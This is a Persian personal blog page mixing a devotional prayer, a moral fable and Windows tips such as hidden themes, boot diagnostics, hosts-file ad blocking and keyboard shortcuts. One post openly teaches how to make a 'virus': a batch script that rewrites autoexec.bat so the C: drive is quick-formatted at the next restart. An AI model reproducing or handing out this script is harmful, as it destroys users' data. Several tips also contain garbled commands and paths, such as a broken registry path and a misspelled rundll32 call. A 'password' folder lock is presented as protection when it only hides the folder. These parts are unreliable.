الکی مثلاً وبلاگ داریم... √√√

سعی میشود هر ماه جالب ترین مطالب در این وبلاگ درج گردد./

الکی مثلاً وبلاگ داریم... √√√

سعی میشود هر ماه جالب ترین مطالب در این وبلاگ درج گردد./

دعای معراج.(عاشق این دعا هستم من)

شرح دعای معراج:


از رسول اکرم منقول است :آن شبی که مرا به معراج بردند از تمامی آسمانها گذشتم تا به آسمان هفتم رسیدم و آنچه دیده بودم و با خدای تعالی بیواسطه سخن گفتم و مراجعت نمودم به مقام جبرئیل رسیدم ، گفتم یا جبرئیل این چه دعائیست که جمله فرشتگان می خوانند؟گفت:یا محمد این همان دعاست که از جانب حق به شما آوردم و خدای تعالی می فرماید:هر که از آدم تا خاتم این دعا را بخواند یا با خود دارد عزیز و مکرم گردد و حاجتش برآورده شود و حق تعالی هیچ حجاب در میان او و خودش نگذارد و او را از جمیع بلایا محفوظ دارد و اگر از آدم تا خاتم جمع شود و جمیع دریاها مرکب گردد  و زمین کاغذ گردد و چندان نویسند که همه فرشتگان مانده شوند و دریاها خشک شوند و آسمان و زمین تمام شود نمی توانند ثواب این دعا را بنویسند و از هزار یکی نوشته نشود و خواننده و دارنده این دعا را تنگی دست ندهد و تا روز اجل بستگی در کار وی نشود و از درد گوش و درد سر و چشم و دل و جمیع دردها و بلاها ایمن گردد و هر کس این دعا را با خود بگور برد حق سبحانه او را بخشد و سکرات موت را بر وی آسان گرداند  و از عذاب قبر و سوال منکر و نکیر ایمن گردد  و روز جزا چهل هزار فرشته به استقبال وی برآیند تا داخل بهشت می کنند :



دعا در ادامه ی مطلب ↓

ادامه مطلب ...

تـــــــم‌های مخفــــــــــــــی ویندوز 7

این تم ها مربوط به کشورهای استرالیا، کانادا، بریتانیا، ایالات متحده و آفریقای جنوبی شامل تصاویر پشت زمینه‌ای از این کشورها هستند.

بدین منظور:
ابتدا بایستی قابلیت مشاهده فایل‌های مخفی سیستم را فعال نمایید. در منوی Start عبارت Folder Options را وارد کرده و Enter بزنید. در پنجره Folder Options به تب View بروید و تیک گزینه Hide protected operating system files را بردارید و Yes را انتخاب کنید. سپس پنجره را OK کنید.
اکنون وارد Computer شوید.
حال به مسیر C:\Windows\Globalization\MCT مراجعه کنید.
در این مسیر 5 فولدر مشاهده می‌کنید. این 5 فولدر متعلق به 5 تم مخفی هستند (ترفندستان) و عبارات 2 حرفی که در نام آنها مشاهده می‌کنید مخفف کشورهایی هستند که در بالا نام بردیم.
به دلخواه وارد یکی از پوشه‌ها شوید. سپس به فولدر Theme مراجعه کنید و بر روی فایل موجود در آن دو بار کلیک کنید.
تم مورد نظر انتخاب شده و در حافظه ویندوز ذخیره شده است.
این کار را در هر 5 فولدر انجام دهید.
اکنون در صورتی که بر روی فضای خالی از صفحه دسکتاپ راست کلیک کنید و Personalize را انتخاب کنید، در قسمت My Themes این 5 تم جدید را مشاهده میکنید. با کلیک بر روی هر کدام تم مورد نظر انتخاب می‌شود.

8 ترفند برای ترک اعتیاد به اینترنت

اگر ساعت‌های زیادی از وقت مفید و اوقات فراغت خودتان را پای اینترنت صرف می‌کنید، اگر جهت دانلود رایگان یا وبگردی تا نیمه شب بیدارید، اگر با دوستان‌تان در یاهو مسنجر قرار گذاشته‌اید تا ساعت‌ها چت کنید، اگر می‌خواهید در گروه دوستیابی که به تازگی عضو شده‌اید گشت‌زنی کنید تا دوستان بیشتری جذب کنید، اگر... هیچ بعید نیست که شما گریبانگیر پدیده‌ای به نام «اعتیاد به اینترنت» شده‌اید. به ویژه اگر می‌بینید اعضای خانواده برای سلامتی شما نگرانند و به هیچ یک از کارهای خود نمی‌رسید. همینطور هزینه زیادی را نیز قطعاً بابت سرویس اینترنت خود متحمل شده‌اید. در این ترفند قصد داریم به معرفی 8 راهکار جهت ترک اعتیاد به اینترنت بپردازیم.

.

.

.

ادامه مطلب ...

افزایش سرعت بالا آمدن ویندوز ویستا و 7 با انجام یک تنظیم ساده

یکی از مشکلات شایع در سیستم‌های تحت ویندوز، کند بودن سرعت بالا آمدن و راه‌اندازی آن است. به طوری که پس از روشن کردن سیستم، زمان زیادی صرف ورود به ویندوز و بارگذاری کامل صفحه دسکتاپ می‌شود. این موضوع در کامپیوترهای قدیمی و سیستم‌هایی که دارای نرم‌افزارهای نصب شده زیادی هستند بیشتر به چشم می‌خورد. بسیاری از کاربران برای حل این مشکل از طریق تنظیمات msconfig به خالی کردن برنامه‌های اجرا شده در Startup میپردازند. این راه مفید است اما همواره نمی‌تواند کافی باشد. در صورتی که از ویندوز ویستا یا 7 استفاده می‌کنید و با این مشکل روبرو هستید، بایستی بدانید در این دو ویندوز قابلیتی به نام Windows Boot Performance Diagnostics نفهته است که بسیاری از کاربران از آن بی‌خبرند. با فعال نمودن این ابزار، ویندوز به طور اتوماتیک موانعی که باعث کاهش سرعت بالا آمدن ویندوز می‌شود را به طور اتوماتیک تشخیص داده و آنها را رفع می‌کند. در این ترفند قصد داریم به معرفی این قابلیت مفید بپردازیم.

برای این کار:
ابتدا در منوی Start عبارت gpedit.msc را وارد کرده و Enter بزنید.
در پنجره Local Group Policy Editor از پنل سمت چپ مسیر زیر را طی کنید:
Computer Configuration > Administrative Templates > System > Troubleshooting and Diagnostics > Windows Boot Performance Diagnostics
اکنون از قسمت سمت راست پنجره، بر روی Configure Scenario Execution level دوبار کلیک کنید.
در پنجره جدید، گزینه Enabled را انتخاب نمایید. همچنین (ترفندستان) اطمینان پیدا کنید در قسمت Scenario Execution Level گزینه Detection, Troubleshooting and Resolution در حالت انتخاب باشد.
اکنون بر روی دکمه OK کلیک کنید.
حال ویندوز را یکبار Restart نمایید.
اکنون Windows Boot Performance Diagnostics فعال بوده و به تشخیص و حل مشکلاتی که باعث کندی بالا آمدن ویندوز می‌شود می‌پردازد.

دقت نمایید برای این که Windows Boot Performance Diagnostics به درستی کار کند، بایستی سرویس (Diagnostic Policy Service (DPS در محیط ویندوز فعال باشد. برای اطمینان این قضیه:
در منوی Start عبارت Services را تایپ کرده و Enter بزنید.
در پنجره باز شده Diagnostic Policy Service را یافته و اطمینان پیدا کنید وضعیت (Status) آن بر روی Started قرار گرفته است.

بنظر شما نجس ترین چیز در این دنیای خاکی چیست؟؟؟

گویند روزی پادشاهی این سوال برایش پیش می آید و می خواهد بداند که نجس ترین چیزها در دنیای خاکی چیست؟ برای همین کار، وزیرش را مامور می کند که برود و این نجس ترین نجس ترینها را پیدا کند و در صورتی که آنرا پیدا کند و یا هر کسی که بداند، سنگین ترین خلعت تخت و تاجش را به او بدهد. وزیر هم عازم س...فر می شود و پس از یکسال جستجو و پرس و جو از افراد مختلف به این نتیجه رسید که با توجه به حرفها و صحبتهای مردم باید پاسخ همین مدفوع آدمیزاد اشرف باشد و عازم دیار خود می شود. در نزدیکی های شهر چوپانی را می بیند و به خود می گوید بگذار از او هم سوال کنم شاید جواب تازه ای داشت بعد از صحبت با چوپان او به وزیر می گوید من جواب را می دانم اما یک شرط دارد و وزیر نشنیده شرط را می پذیرد. چوپان هم می گوید تو باید مدفوع خودت را بخوری وزیر آنچنان عصبانی می شود که می خواهد چوپان را بکشد ولی چوپان به او می گوید تو می توانی من را بکشی اما مطمئن باش پاسخی که پیدا کرده ای غلط است، تو اینکار را بکن اگر جواب قانع کننده ای نشنیدی من را بکش.

خلاصه وزیر به خاطر رسیدن به جایزه بزرگ هم که شده قبول می کند و آن کار را (اسمشو نبر را) انجام می دهد سپس چوپان به او می گوید کثیف ترین و نجس ترین چیزها طمع است که تو به خاطرش حاضر شدی آنچه را فکر می کردی نجس ترین است بخوری
.

جلو گیری از دانلود در اینترنت اکسپلورر

حتمآ اگر شیکه دارید متوجه شدید که کاربران قصد دانلود دارند و دور از چشم شما این کار رو میکنن برای جلو گیری از دانلود این کار ها را انجام بدید
1- نرم افزار Regedit را اجرا کنید
2-وارد مسیر زیر شده :
HKEY-CRRENT USER\SOFTWARE\MICROSOFT\WINDOWS\C...URRETVERSION\INT ERNETSETTING\ZONE\3
3- روی دستور 1803 دوبار کلیک کنید و درون آن مقدار 3 را وارد کنید.
بعداز تایید این مقدار و باز کردن دوباره برنامه Internet Explorer دیگر هیچ کاربری برروی آن کامپیوتر نمیتواند از طریق Explorer فایلی را Download کند.
برای بازگشت به حالت اولیه مقدار 3 را پاک کرده و به دستور 1803 مقدار صفر را اضافه کنید.

مفیدترین نوشیدنی جهان !

                                        مفیدترین نوشیدنی جهان

چای،چای سبز، آب معدنی، قهوه نسکافه، کاپوچینو، کافه میکس یا…

هیچکدام از نوشیدنی ها جواب صحیح نیست، اگر کنجکاو شده اید و می خواهید بدانید جواب این معماچیست، پس ادامه مطلب را کلیک کنید...

glass-of-water

ادامه مطلب ...

استفاده از نوار آدرس مرورگر به عنوان یک ماشین حساب

فرض کنید که در حال گشت‌و‌گذار در محیط وب هستید و قصد دارید تا یک عمل ریاضی نظیر جمع یا تفریق را انجام دهید. شاید سریع‌ترین راهی که به ذهن می‌رسد استفاده از ماشین حساب ویندوز باشد. اما باید بدانید که می‌توانید از این نیز سریع‌تر عمل کنید! در این ترفند قصد داریم نحوه استفاده از نوار آدرس مرورگر اینترنت به عنوان یک ماشین حساب را برای شما بازگو کنیم. به طوری که بدون نصب هرگونه افزونه‌ای و در هر مرورگر دلخواهی، می‌توانید عملیات ریاضی را در قسمت نوار آدرس مرورگر انجام دهید و جواب بگیرید.

بدین منظور:
ابتدا مرورگر اینترنتی دلخواه خود را باز کنید.
اکنون در نوار آدرس مرورگر (محلی که آدرس‌های اینترنتی را وارد می‌کنید) عبارت زیر را وارد کنید:
javascript:X+Y
به جای X و Y دو عدد دلخواه را وارد کنید. به عنوان مثال برای محاسبه جمع دو عدد 14 و 29 بایستی این عبارت را وارد نماییم:
javascript:14+29
خواهید دید که عدد 43 به عنوان نتیجه بر روی صفحه نقش می‌بندد.

شما می‌توانید از هر 4 عمل اصلی ریاضی استفاده کنید. به مثال زیر (ترفندستان) که در آن علائم تفریق، ضرب و تقسیم نیز استفاده شده است توجه کنید:
javascript:(17-2)/3*2
حاصل این عبارت 10 خواهد بود.

همچنین شما امکان محاسبه توان و جذر اعداد را نیز خواهید داشت. عبارت زیر حاصل 2 به توان 3:
(javascript:Math.pow(2,3
و عبارت بعدی حاصل جذر عدد 32 را نمایش خواهد داد:
(javascript:Math.sqrt(32

در صورتی که این ترفند بر روی مرورگر شما عمل نکرد، قابلیت Javascript بر روی مرورگر شما غبرفعال است که بایستی از قسمت تنظیمات مرورگر،‌ آن را فعال کنید.

Google Goggles جستجوگر عکس پیشرفته گوگل در دسترس همگان

گوگل به تازگی دو ابزار جدید جستجو برای دسکتاپ ها به نام های Voice و Image را رونمایی کرده اند که از دو ابزار موبایل خود با نام های Voice Search و Google Goggles الهام گرفته شده است.

Voice Search در دسکتاپ که یکی از ابزارهای مرورگر کروم است، این امکان را می دهد که کاربران با استفاده از میکروفن و کلیک کردن بر روی آیکن مورد نظر در صفحه جستجو، با کامپیوتر خود صحبت کنند!

به نقل از searchengineland، یکی از مهمترین کارهایی که گوگل بر روی آن تمرکز زیادی کرده است، آموزش این ابزار و افزایش هوشمندی آن است که این کار را با افزایش سرعت امکان دسترسی به این ابزار برای کاربران دنبال می کند. هم اکنون وروردی های این ابزار که باعث افزایش رشد هوشمندی آن شده است، از ابتدای ورورد آن، ۶ برابر شده است.

در کنار آموزش این ابزار، آموزش کاربران نیز وجود دارد. هم اکنون این جستجوگر پیشرفته قابلیت تعامل خوبی با افرادی که در صحبت کردن مشکلاتی دارند و افرادی که دائما دست های آنها پر است دارد!

از هفته دیگر قادر خواهید بود در سایت Google.com انگلیسی و توسط مرورگر Chrome از این ابزار به راحتی استفاده کنید.

Google Search by Image هم قسمتی از ابزار جستجوی تصاویر گوگل برای موبایل ها است که به نام Google Goggles تاکنون استفاده شده است. همانطور که می دانید در Goggles کاربران یک عکس را به جستجوگر معرفی می کنند و گوگل گاگل موردهای مشابه آنرا به کاربر پس خواهد داد! کاربران با استفاده Drag and Drop یا آپلود کردن عکس یا معرفی آدرس عکس، آنرا به گاگل معرفی می کنند.

امکان جالب دیگری که در مرورگرهای فایرفاکس و کروم وجود دارد این است که با نصب یک extention شما قادر خواهید بود با کلیک راست بر روی عکس مستقیم نتایج گوگل گاگل را مشاهده کنید.

امکانات جالب این جستجوگر عکس پیشرفته بسیار زیاد است. به عنوان مثال اگر شما محلی که عکس گرفته اید را فراموش کرده اید یا زمان آنرا، نتایجی که به شما می دهد تمامی آن فراموشی های شما را به یادتان خواهد آورد. جستجو بر اساس محل دقیق، محدوده زمان و … نتایج شما را بسیار جذایب و دقیقتر خواهد کرد.

آموزش حذف تبلیغات یاهو مسنجر

آموزش حذف تبلیغات یاهو مسنجر:

ابتدا یاهو مسنجر را به طور کامل ببندید و به این آدرس بروید :

C:\Windows\System32\drivers\etc

فایل هاستس رو با نوت پد باز کنید و این خط را به آخر فایل اضافه کنید: (hosts)

 

127.0.0.1           insider.msg.yahoo.com

 

سپس فایل رو سیو کنید و یاهو مسنجر را باز کنید و از عدم وجود تبلیغات لذت ببرید :)

البته شاید برنامه هایی هم باشند که اینکار رو بکنند ولی خوب این روش دستی و قابل اعتماد تره...

Bookmark بوک مارک کردن یک لینک جهت دسترسی سریع

توی گوگل اِرث، فایر فاکس یا اینترنت اکسپلورر

 

صفحه مورد نظرتون رو باز کنین،این کلید ها رو بزنین

"Ctrl + D"

__________

اگه میخواین اسم خاصی براش انتخاب کنین توی تکست باکسِ

"Name"

اسم مورد نظرتون رو بنویسین

__________

"Done" (in FireFox & Google Earth)

or

"Add" (in IE)

رو بزنین!

ترفند قفل کردن کامپیوتر توسط یک Shortcut

قفل کردن کامپیوتر توسط یک Shortcut شاید تا به حال به فکر یافتن راهی بوده اید که کامپیوتر خود را راحتر از آنچه متداول است در حات Lockقرار دهید.این کار بسیار ساده است وباطی کردن مراحل زیر شما میتوانیدیکIconبه دسکتاپ یا Quick Launchاضافه کنیدکه با یک ضربه ماوس بر روی آن سیستم شما در حالت Lockقرار میگیرد.

1-بر روی صفحه نمایش خود کلیک راست کنید واز ...Newگزینه ی Shortcutرا انتخاب کنید.

2-در پنجره هایی که ظاهر شده در قسمتType the location of the itemفرمان زیر را بنویسید:

rund32.exe user32.dll,LockWorkStation user32.dll,LockWorkStation

3-بر روی Nextکلیک کنیدو نام Shortcutراوارد کنید و برکلیدFinishرا بزنید.

جهت راحتی شما بیشتر پیشنهاد می شود که میانبرShortcutایجادشده را با ماوس به یک قسمت از فضای خالیQuick Launchبکشید تا از این پس در هنگام نیاز با زدن یک کلید دستگاه شما در حالتLockقرار گیرد.

ساخت یک ویروس کوچک برای فرمت کردن یک درایو مشخص

 آموزش ساخت ویروس : ابتدا برنامه Notepad ویندوز را اجرا کنید ( Start/All Programs/Accessories )

سپس با استفاده از فرمان Copy & Paste کدهای زیر را در محیط برنامه کپی کنید:

 

 

@ echo off

...

call attrib -r -h c:autoexec.bat > nul

echo @echo off > c:autoexec.bat

echo format /autotest c:/q > nul >> c:autoexec.bat

call attrib +r +h c:autoexec.bat > nul

exit

حال از منوی File بر روی Save as کلیک کنید.

از منوی کشویی Save as type گزینه All Files را برگزینید.

در قسمت File Name عبارت txt.* را پاک کنید و به جای آن نام دلخواه خود را تایپ کرده و پسوند bat. را به انتهای آن اضافه کنید ، به طور مثال thebesthacker.bat

سپس مکان مورد نظر برای ذخیره فایل را مشخص کرده و روی دکمه Save کلیک کنید.

اکنون فایل فرمت شما آماده است. کافی است یکبار پس از اجرای فایل ، سیستم restart شود تا فایل فعال شود.

کلید های میانبر صفحه کلید

Esc لغو عملیات در حال انجام.

F1 راهنما.

F2 تغییر نام آیتم  انتخاب شده

. F3 جستجو.

F4 باز کردن لیست پایین رونده Address Bar

...
ادامه مطلب ...

ساخت آیکون بدون نام

یکی از قابلیت های جالبی که در ویندوز امکان انجام آن است ساخت آیکون های بدون نام برای فایل ها و فولدرهاست. با این ترفند شما میتوانید آیکونی بدون نام و تنها با یک شکل داشته باشید.

برای ساختن یک آیکون بدون نام :

 

ابتدا مطمئن باشید که کلید

Num lock

...

روشن باشد.

 

بر روی آیکون مورد نظر کلیک کنید.

سپس راست کلیک و

Rename

را انتخاب کنید.

 

نام قبلی آیکون را پاک کنید.

 

کلید

Alt

را بگیرید و عدد 0160 را تایپ کنید.

 

سپس

Enter

بزنید ؛ شما یک آیکون بدون نام دارید.

قفل و رمز دار کردن فایل ها و پوشه ها بدون نیاز به هیچ نرم افزاری

تو این پست می خوام ترفندی رو بهتون یاد بدم که به وسیله اون خیلی راحت بتونید فایل ها و پوشه هاتون رو قفل و رمز دار کنید تا کسی غیر از خودتون نتونه به اون فایل ها و پوشه ها دسترسی پیدا کنه . ایتدا نرم افزار notepad رو باز کنید و کدهای زیر رو در این نرم افزار کپی کنید :

 

@ECHO OFF

title Folder Private

if EXIST “Control Panel.{21EC2020-3AEA-1069-A...2DD-08002B30309D}” goto :UNLOCK

if NOT EXIST Private goto :MDLOCKER

:CONFIRM

echo Are you sure you want to lock the folder(Y/N)

set/p “cho=>”

if %cho%==Y goto :LOCK

if %cho%==y goto :LOCK

if %cho%==n goto :END

if %cho%==N goto :END

echo Invalid choice.

goto :CONFIRM

:LOCK

ren Private “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”

attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”

echo Folder locked

goto :End

:UNLOCK

echo Enter password to unlock folder

set/p “pass=>”

if NOT %pass%== password here goto :FAIL

attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”

ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Private

echo Folder Unlocked successfully

goto :End

:FAIL

echo Invalid password

goto :end

:MDLOCKER

md Private

echo Private created successfully

goto :End

:End

تو قسمتی از کد که نوشته شده password here‌ رمز ورود خودتون رو وارد کنید ، بعد از منوی File روی گزینه Save as کلیک کنید یا کلیک های ترکیبی ctrl+s رو بگیرید و فایل رو با نام دلخواه و پسوند bat. ذخیره کنید ، مثلاً lock.bat . سپس فایل رو اجرا کنید ، می بینید یه پوشه با نام Private در مسیری که فایل bat رو ذخیره و اجرا کردید ظاهر میشه . فایل ها و پوشه هایی که می خواید قفل و رمز دار شن رو به این پوشه انتقال بدید و دوباره فایل bat ‌رو اجرا کنید ، یه صفحه داس باز میشه که می پرسه ایا می خواید فولدر رو قفل کنید ؟ کلید y رو بزنید و اینتر کنید ؛ می بینید که فولدر Private مخفی میشه ، حالا دوباره فایل bat رو اجرا کنید ، این بار از شما رمز می خواد و تا رمز رو درست وارد نکنید فولدر Private نمایش داده نمیشه .

عیب این روش اینه که به راحتی میشه فایل bat رو ویرایش یا حذف کرد ولی خب این روش برای اونهایی که نمی خوان از نرم افزار استفاده کنن می تونه مفید باشه ، می تونید اون فایل bat رو هم مخفی کنید و یه اسم بی ربط بزارید تا کسی اگر یه موقع فایل های مخفی رو نمایان کرد زیاد به این فایل bat مشکوک نشه .

Add

افزودن

Run

به منوی استارت  ویندوز ویستا و 7

ابتدا بر روی منوی استارت راست کلیک کنید و

...

Properties

را انتخاب نمایید.

 

در پنجره باز شده به تب

Start Menu

بروید و بر روی دکمه

Customize

کلیک کنید.

 

گزینه

Run Command

را بیاید و تیک آن را بزنید.

 

اکنون کلیه پنجره‏های باز را

Ok

 کنید و بر روی منوی استارت کلیک کنید تا

Run

را مشاهده کنید.

 

لازم به ذکر است شما می‏توانید از کلیدهای ترکیبی

Win+R

نیز استفاده کنید. همچنین نوار جستجوی موجود در منوی استارت ویندوز ویستا و 7 نیز کارایی مشابه

Run

را دارد.

12 کلید میان‌بر که احتمالاً بلد نیستید!

1. ساخت فولدر جدید در ویندوز 7:
شما با استفاده از کلیدهای ترکیبی Ctrl+Shift+N می‌توانید در محیط ویندوز 7، یک پوشه جدید بسازید. کاری که در ویندوزهای قبلی امکان‌پذیر نبود.

2. بازیابی تب‌های به اشتباه بسته شده در مرورگرها:
با استفاده از کلیدهای ترکیبی در Ctrl+Shift+T می‌توان آخرین تب بسته شده در مرورگر را مجدد بازیابی کرد. این ترفند بر روی کلیه مرورگرهای جدید عملی است.

3. ایجاد یک یادداشت جدید با وارد کردن محتویات کلیپ‌بورد در نرم‌افزار Evernote:
نرم‌افزار Evernote یک برنامه پرطرفدار برای یادداشت‌برداری است که برای اکثر سیستم‌عامل‌های معروف عرضه شده است. در صورتی که از این برنامه در محیط ویندوز استفاده می‌کنید، با استفاده از کلیدهای ترکیبی Ctrl+Alt+V در هر قسمتی از محیط ویندوز، می‌توانید آنچه که پیش از این Copy کرده‌اید را در یک یادداشت جدید تحویل بگیرید. در نتیجه دیگر نیازی نیست یک یادداشت جدید ایجاد کنید و محتویات کلیپ‌بورد را در آن Paste کنید.

4. دو کلید ترکیبی در فیس‌بوک:
پس از ورود به سایت Facebook و ورود به حساب کاربری خود، با استفاده از کلید ترکیبی Alt+1 می‌توانید مستقیماً به صفحه News Feed مراجعه کنید. همچنین کلیدهای Alt+2 شما را مستقیماً به صفحه پروفایل‌تان خواهد برد. دقت کنید در صورتی که از مرورگر فایرفاکس استفاده می‌کنید از کلیدهای Alt+Shift به جای Alt استفاده کنید. همچنین از کلیدهای عددی بالای کیبورد استفاده نمایید.

5. ارسال پست جدید در توئیتر:
در محیط Twitter، با فشردن کلید n، امکان ارسال یک توئیت جدید مهیا خواهد شد. همچنین فشردن کلید g و پس از آن r، شما را به تب Mentions@ خواهد برد.

6. فعالیت‌های سریع در TweetDeck:
یکی از نرم‌افزارهای پرطرفدار در حوزه شبکه‌های اجتماعی نرم‌افزار TweetDeck است که به کاربر امکان مدیریت حساب‌های خود در شبکه‌های اجتماعی نظیر فیس‌بوک و توئیتر را می‌دهد. در صورتی که شما نیز از این برنامه برای حساب توئیتر خود استفاده می‌کنید، بعد از اینکه یک توئیت را با استفاده کلیدهای بالا و پایین انتخاب کردید، کلید Space را فشار دهید. خواهید دید که یک پنل کوچک پدیدار می‌شود که با فشردن کلیدهای که در آن مشخص شده است می‌توانید فعالیت‌های مختلفی را بر روی آن توئیت اعمال کنید. لازم به ذکر است فشردن کلید میان‌بر / در این برنامه، یک ستون جستجوی جدید ایجاد خواهد کرد.

7. بررسی نتایج گوگل با کی‌بورد:
برای استفاده از این ترفند بایستی در ابتدا از فعال بودن قابلیت Instant در جستجوی گوگل اطمینان پیدا کنید. برای این کار بایستی به صفحه Search settings گوگل بروید و اطمینان پیدا کنید گزینه Use Google Instant انتخاب شده باشد. اکنون (ترفندستان) در صورتی که عبارتی در گوگل جستجو کنید، پس از مشاهده نتایج، با استفاده از کلیدهای بالا و پایین می‌توانید هر نتیجه را به حالت انتخاب دربیاورید. با فشردن Enter وارد آن شوید و با فشردن کلید جهت راست، صفحه پیش‌نمایش آن را مشاهده کنید.

8. ارسال سریع ایمیل در Gmail:
پس از تایپ متن یک ایمیل در محیط Gmail، به جای کلیک بر روی دکمه Send، کافی است کلیدهای ترکیبی Tab+Enter را فشار دهید تا ایمیل ارسال شود.

9. ورود به آیتم کنونی در گوگل ریدر:
در صورتی که از گودر برای مطالعه فید سایت‌های مورد علاقه خود استفاده می‌کنید، کافی است به هنگام مشاهده یک آیتم، کلید V را فشار دهید. خواهید دید که مستقیماً به صفحه‌ پست مورد نظر در سایت اصلی خواهید رفت.

10. عکس‌برداری از پنجره جاری در محیط ویندوز:
اکثر کاربران اطلاع دارند که با فشردن کلید Print Screen در محیط ویندوز، یک تصویر از کل صفحه در کلیپ‌بورد ویندوز ذخیره خواهد شد. اما در صورتی که از کلید ترکیبی Alt+Print Screen استفاده کنید، یک تصویر از پنجره جاری ویندوز در کلیپ‌بورد ذخیره می‌شود.

11. ثبت تاریخ جاری در Notepad:
در صورتی که قصد دارید تاریخ و ساعت جاری را در Notepad وارد کنید، نیازی به تایپ آن نخواهید داشت. کافی است کلید F5 را فشار دهید تا زمان کنونی درج گردد.

12. کلیدهای میان‌بر در Windows Live Writer:
نرم‌افزار WLW برنامه‌ای است که اکثر وبلاگ‌نویسان حرفه‌ای با آن سروکار دارند و نگارش مطالب خود را توسط آن انجام می‌دهند. در صورتی که شما نیز از این برنامه بهره‌ می‌گیرید بایستی بدانید با استفاده از کلید F2 به هنگام نگارش یک پست جدید، می‌توانید جزئیات مطلب نظیر موضوع و زمان ارسال آن را تغییر دهید. همچنین کلیدهای ترکیبی Ctrl+Alt+1 الی Ctrl+Alt+6 اندازه عنوان را از کوچک به بزرگ تغییر خواهد داد.